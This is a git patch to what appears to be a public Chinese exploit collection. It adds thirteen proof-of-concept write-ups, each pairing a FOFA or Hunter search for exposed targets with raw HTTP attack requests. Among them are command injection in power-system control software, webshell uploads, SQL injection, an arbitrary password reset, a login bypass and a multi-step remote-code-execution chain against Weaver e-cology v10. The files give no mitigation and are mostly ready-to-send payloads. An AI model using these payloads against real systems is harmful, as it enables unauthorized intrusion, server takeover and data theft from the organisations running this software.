From fcad930af342bc80e0ed3a2f15184c08c53fd214 Mon Sep 17 00:00:00 2001 From: wy876 Date: Wed, 21 Aug 2024 11:13:45 +0800 Subject: [PATCH] =?UTF-8?q?24-08-21=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...制软件set_timezone接口存在远程命令执行漏洞.md | 29 +++++ ...端操作平台多个接口处存在敏感信息泄露漏洞.md | 67 ++++++++++ LiveGBS任意用户密码重置漏洞.md | 33 +++++ README.md | 18 ++- ...管理平台receivefile_gd.jsp存在SQL注入漏洞.md | 24 ++++ 华夏ERPV3.3存在信息泄漏漏洞.md | 24 ++++ ...云视频平台UploadFile.aspx存在文件上传漏洞.md | 36 ++++++ 微商城系统api.php存在文件上传漏洞.md | 27 +++++ 微商城系统goods.php存在SQL注入漏洞.md | 22 ++++ 某业务管理系统LoginUser存在信息泄露漏洞.md | 34 ++++++ ...管理系统oaMobile_fjUploadByType存在文件上传漏洞.md | 49 ++++++++ 泛微e-cology-v10远程代码执行漏洞.md | 114 ++++++++++++++++++ ...ecology系统接口BlogService存在SQL注入漏洞.md | 72 +++++++++++ 私有云管理平台存在登录绕过漏洞.md | 21 ++++ 14 files changed, 569 insertions(+), 1 deletion(-) create mode 100644 Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md create mode 100644 JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md create mode 100644 LiveGBS任意用户密码重置漏洞.md create mode 100644 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md create mode 100644 华夏ERPV3.3存在信息泄漏漏洞.md create mode 100644 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md create mode 100644 微商城系统api.php存在文件上传漏洞.md create mode 100644 微商城系统goods.php存在SQL注入漏洞.md create mode 100644 某业务管理系统LoginUser存在信息泄露漏洞.md create mode 100644 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md create mode 100644 泛微e-cology-v10远程代码执行漏洞.md create mode 100644 泛微ecology系统接口BlogService存在SQL注入漏洞.md create mode 100644 私有云管理平台存在登录绕过漏洞.md diff --git a/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md new file mode 100644 index 0000000..24cabf4 --- /dev/null +++ b/Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞.md @@ -0,0 +1,29 @@ +# Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞 + +电力系统控制软件 Altenergy Power Control Software C1.2.5版本的系统/set_timezone接口存在命令注入漏洞,攻击者可执行任意命令获取服务器权限。 + +## fofa + +```yaml +title="Altenergy Power Control Software" +``` + +## poc + +```java +POST /index.php/management/set_timezone HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +timezone=`id > rce.txt` +``` + +![image-20240820204404636](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408202044765.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Zf5Jrr2pozEBVxBaV8BsgQ \ No newline at end of file diff --git a/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..8b3235e --- /dev/null +++ b/JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md @@ -0,0 +1,67 @@ +## JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞 + +JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。 + +## fofa + +```yaml +title="JieLink+智能终端操作平台" +``` + +## poc + +``` +POST /report/ParkChargeRecord/GetDataList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Authorization: Bearer test +Cookie: JSESSIONID=test;UUID=1; userid=admin +X-Requested-With: XMLHttpRequest +Content-Length: 21 +Origin: http://x.xx.xx.x:xxx +Connection: close +Referer: http://x.xx.xx.x:xxx/Report/ParkOutRecord/Index +Sec-GPC: 1 +Priority: u=1 + +page=1&rows=20000 +``` + +``` +GET /Report/ParkCommon/GetParkInThroughDeivces HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Origin: +Connection: close +Referer: +Sec-GPC: 1 +``` + +``` +GET /report/ParkOutRecord/GetDataList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 +Accept: application/json, text/javascript, \*/\*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Authorization: Bearer test +Cookie: JSESSIONID=test;UUID=1; userid=admin +X-Requested-With: XMLHttpRequest +Content-Length: 2 +Origin: +Connection: close +Referer: +Sec-GPC: 1 +Priority: u=1 +``` + +![image-20240820094038330](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408200941857.png) \ No newline at end of file diff --git a/LiveGBS任意用户密码重置漏洞.md b/LiveGBS任意用户密码重置漏洞.md new file mode 100644 index 0000000..c74ac49 --- /dev/null +++ b/LiveGBS任意用户密码重置漏洞.md @@ -0,0 +1,33 @@ +# LiveGBS任意用户密码重置漏洞 + +LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码 + +## fofa + +```yaml +icon_hash="-206100324" +``` + +## poc + +### 获取用户id + +``` +/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc +``` + +![image-20240820155005009](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550568.png) + +### 通过id更改用户密码 + +``` +/api/v1/user/resetpassword?id=22&password=123456 +``` + +![image-20240820155041297](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550695.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ \ No newline at end of file diff --git a/README.md b/README.md index 3ee2ccc..86713d6 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,21 @@ # 漏洞收集 -收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了900多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了1000多个poc/exp,善用CTRL+F搜索 + +## 2024.08.21 新增漏洞 + +- JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞 +- 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞 +- LiveGBS任意用户密码重置漏洞 +- 泛微e-cology-v10远程代码执行漏洞 +- 华夏ERPV3.3存在信息泄漏漏洞 +- 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞 +- 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞 +- 泛微ecology系统接口BlogService存在SQL注入漏洞 +- Altenergy电力系统控制软件set_timezone接口存在远程命令执行漏洞 +- 私有云管理平台存在登录绕过漏洞 +- 微商城系统api.php存在文件上传漏洞 +- 微商城系统goods.php存在SQL注入漏洞 +- 某业务管理系统LoginUser存在信息泄露漏洞 ## 2024.08.17 新增漏洞 diff --git a/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md new file mode 100644 index 0000000..5803b6b --- /dev/null +++ b/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞 + +万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞,攻击者可获取数据库敏感信息。 + +## fofa + +```yaml +app="万户ezOFFICE协同管理平台" +``` + +## poc + +``` +GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=221;waitfor+delay+'0:0:5'--+- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Connection: close +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Oy5iPqfBXAh46tjHZFSg8w \ No newline at end of file diff --git a/华夏ERPV3.3存在信息泄漏漏洞.md b/华夏ERPV3.3存在信息泄漏漏洞.md new file mode 100644 index 0000000..45cb508 --- /dev/null +++ b/华夏ERPV3.3存在信息泄漏漏洞.md @@ -0,0 +1,24 @@ +# 华夏ERPV3.3存在信息泄漏漏洞 + +华夏ERPV3.3存在信息泄漏漏洞,可获取用户敏感信息。 + +## hunter + +```yaml +web.icon=="f6efcd53ba2b07d67ab993073c238a11" +``` + +## poc + +```java +GET /jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/c12Frd6hp0a3r8A9-lVr-g \ No newline at end of file diff --git a/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md new file mode 100644 index 0000000..dcce9da --- /dev/null +++ b/奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md @@ -0,0 +1,36 @@ +# 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞 + +奥威亚云视频平台UploadFile.aspx存在文件上传漏洞,攻击者可上传webshell获取服务器权限。 + +## fofa + +```yaml +body="/Upload/DomainInfo/MaxAVALogo.png" +``` + +## poc + +```java +POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje + +------sajhdjqwjejqwbejhqwbjebqwhje +Content-Disposition: form-data; name="file"; filename="shell.aspx." +Content-Type: image/jpeg + +1111 +------sajhdjqwjejqwbejhqwbjebqwhje- +``` + +文件路径`http://ip/shell.aspx` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/Kxmw41l8TK5jnaj63lyG0A \ No newline at end of file diff --git a/微商城系统api.php存在文件上传漏洞.md b/微商城系统api.php存在文件上传漏洞.md new file mode 100644 index 0000000..bad8825 --- /dev/null +++ b/微商城系统api.php存在文件上传漏洞.md @@ -0,0 +1,27 @@ +# 微商城系统api.php存在文件上传漏洞 + +微商城系统 api.php 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 + +## fofa + +```yaml +body="/Mao_Public/js/jquery-2.1.1.min.js" +``` + +## poc + +```java +POST /api/api.php?mod=upload&type=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown + +------WebKitFormBoundaryaKljzbg49Mq4ggLz +Content-Disposition: form-data; name="file"; filename="rce.php" +Content-Type: image/png + + +------WebKitFormBoundaryaKljzbg49Mq4ggLz-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210938048.png) \ No newline at end of file diff --git a/微商城系统goods.php存在SQL注入漏洞.md b/微商城系统goods.php存在SQL注入漏洞.md new file mode 100644 index 0000000..2998252 --- /dev/null +++ b/微商城系统goods.php存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 微商城系统goods.php存在SQL注入漏洞 + +微商城系统 goods.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="/Mao_Public/js/jquery-2.1.1.min.js" +``` + +## poc + +```java +GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(1)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Accept: */* +Accept-Encoding: gzip, deflate +Connection: close +``` + +![img](https://i-blog.csdnimg.cn/direct/2493a6cdfcc046d6b686dae6f3615fee.png) \ No newline at end of file diff --git a/某业务管理系统LoginUser存在信息泄露漏洞.md b/某业务管理系统LoginUser存在信息泄露漏洞.md new file mode 100644 index 0000000..f4c5405 --- /dev/null +++ b/某业务管理系统LoginUser存在信息泄露漏洞.md @@ -0,0 +1,34 @@ +# 某业务管理系统LoginUser存在信息泄露漏洞 + +某业务管理系统LoginUser存在信息泄露漏洞 + +## fofa + +```yaml +body="/Content/LayuiAdmin/login/css/index.css" +``` + +## poc + +``` +POST /Login/LoginUser HTTP/1.1 +Host: your-ip +Content-Length: 79 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive + +{"RecordID":"admin","password":"11111","undefined":"登录","language":"zh-CN"} +``` + +![image-20240821111211654](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408211112724.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/L9_i0oTvhkAAPu94YzAL4Q \ No newline at end of file diff --git a/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md new file mode 100644 index 0000000..aa01e1e --- /dev/null +++ b/正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞.md @@ -0,0 +1,49 @@ +# 正方移动信息服务管理系统oaMobile_fjUploadByType存在文件上传漏洞 + +正方软件股份有限公司移动信息服务管理平台存在任意文件上传漏洞。攻击者可通过任意文件上传获取服务器权限。 + +## fofa + +```yaml +title="移动信息服务管理" || body="URL=/zftal-mobile" +``` + +## poc + +```java +POST /zftal-mobile/oaMobile/oaMobile_fjUploadByType.html HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW +Accept: */* +Content-Length: 457 + +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="yhm" + +123 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="zid" + +456 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="sign" + +789 +------WebKitFormBoundary7MA4YWxkTrZu0gW +Content-Disposition: form-data; name="file"; filename="409.jsp" +Content-Type: text/plain + +111 +------WebKitFormBoundary7MA4YWxkTrZu0gW-- +``` + +文件路径 + +` /zftal-mobile/oaFjUploadByType/409.jsp` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/WrDhyx3wOdwMvSwkF-sXOQ \ No newline at end of file diff --git a/泛微e-cology-v10远程代码执行漏洞.md b/泛微e-cology-v10远程代码执行漏洞.md new file mode 100644 index 0000000..bbcb58d --- /dev/null +++ b/泛微e-cology-v10远程代码执行漏洞.md @@ -0,0 +1,114 @@ +# 泛微e-cology-v10远程代码执行漏洞 + +通过e-cology-10.0的/papi/passport/rest/appThirdLogin接口传入管理员账号信息获取票据,系统依赖 H2 数据库且有 JDBC 反序列化漏洞。 + +## fofa + +```yaml +app="泛微-OA(e-cology)" +``` + +## poc + +### 获取serviceTicketId + +```yaml +POST /papi/passport/rest/appThirdLogin HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 51 + +username=sysadmin&service=1&ip=1&loginType=third + + +---- +HTTP/1.1 200 OK +Server: ****** +Content-Type: application/json;charset=UTF-8 +Connection: keep-alive +Date: Tue, 20 Aug 2024 08:39:09 GMT +traceId: f377fe57-0a32-42e8-80f8-91178393ca96 +Set-Cookie: ETEAMS_TGC=TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx; Path=/ +Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId +Access-Control-Max-Age: 86400 +X-XSS-Protection: 1 +X-Content-Type-Options: nosniff +Content-Length: 179 + +{"success":"true","serviceTicketId":"ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1","message":"登录成功","tgtId":"TGT521-0L9GdBeMWxijLGMwbnRPEATrA9cHd9pvbaQ4sjcKA9EIgY5cBx"} +``` + +### 获取ETEAMSID + +```java +POST /papi/passport/login/generateEteamsId HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Content-Length: 56 + +stTicket=ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1 + + +---- +HTTP/1.1 200 OK +Server: ****** +Content-Type: application/json;charset=UTF-8 +Connection: keep-alive +Date: Tue, 20 Aug 2024 08:41:51 GMT +traceId: d7c16568-6727-4dab-bb87-e8f77ac37703 +Access-Control-Allow-Headers: X-CSRFToken,Authorization,Content-Type,Accept,Origin,User-Agent,DNT,Cache-Control,X-Mx-ReqToken,X-Requested-With,X-File-Name,i18n,token,appkey,userName,password,sw8,eteamsid,traceid,langType,timezoneoffset,authtoken,signature,enableTrans,routePath,tranceid,currentUrl,ebbusinessid,ebBusinessId +Access-Control-Max-Age: 86400 +X-XSS-Protection: 1 +X-Content-Type-Options: nosniff +Content-Length: 114 + +{"code":200,"msg":"接口返回成功","status":true,"data":"THIRD_def423a1574e66bbdb29bc647cd8ccf6","fail":false} +``` + +### 加载org.h2.Driver + +```java +POST /api/bs/iaauthclient/base/save HTTP/1.1 +Host: +Content-Length: 86 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://ip +Referer: http://ip/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +ETEAMSID: THIRD_def423a1574e66bbdb29bc647cd8ccf6 + +{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}} +``` + +### 执行命令 + +``` +POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1 +Host: +Content-Length: 199 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://ip +Referer: http://ip/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +ETEAMSID: THIRD_18cd45709040d63b6b684d94b5773deb + +{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"} +``` + +也可以通过上面第一步、第二步获取ETEAMSID值直接进入后台管理页面。 + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/ACe_UhWsdUV3YPhUERcxsg \ No newline at end of file diff --git a/泛微ecology系统接口BlogService存在SQL注入漏洞.md b/泛微ecology系统接口BlogService存在SQL注入漏洞.md new file mode 100644 index 0000000..7aa0f66 --- /dev/null +++ b/泛微ecology系统接口BlogService存在SQL注入漏洞.md @@ -0,0 +1,72 @@ +# 泛微ecology系统接口BlogService存在SQL注入漏洞 + +泛微ecology系统接口`/services/BlogService`存在SQL注入漏洞 + +## fofa + +```yaml +app="泛微-OA(e-cology)" +``` + +## poc + +```java +POST /services/BlogService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: 192.168.3.139 +Content-Length: 493 + + + + + + 1 + 注入点 + + + + +``` + +```java +POST /services/BlogService HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: 192.168.3.139 +Content-Length: 469 + + + + + + + 1 + + 2 + + 注入点 + + + +``` + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/4mJg0FuOOIBjZn-qTMSaeA \ No newline at end of file diff --git a/私有云管理平台存在登录绕过漏洞.md b/私有云管理平台存在登录绕过漏洞.md new file mode 100644 index 0000000..f77f419 --- /dev/null +++ b/私有云管理平台存在登录绕过漏洞.md @@ -0,0 +1,21 @@ +# 私有云管理平台存在登录绕过漏洞 + +私有云管理平台存在登录绕过漏洞 + +## hunter + +```yaml +web.title="私有云管理后台" +``` + +## poc + +登陆界面抓包改返回响应的数据 + +```java +{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="} +``` + +![image-20240821093116155](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210931202.png) + +![image-20240821092633292](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408210926351.png) \ No newline at end of file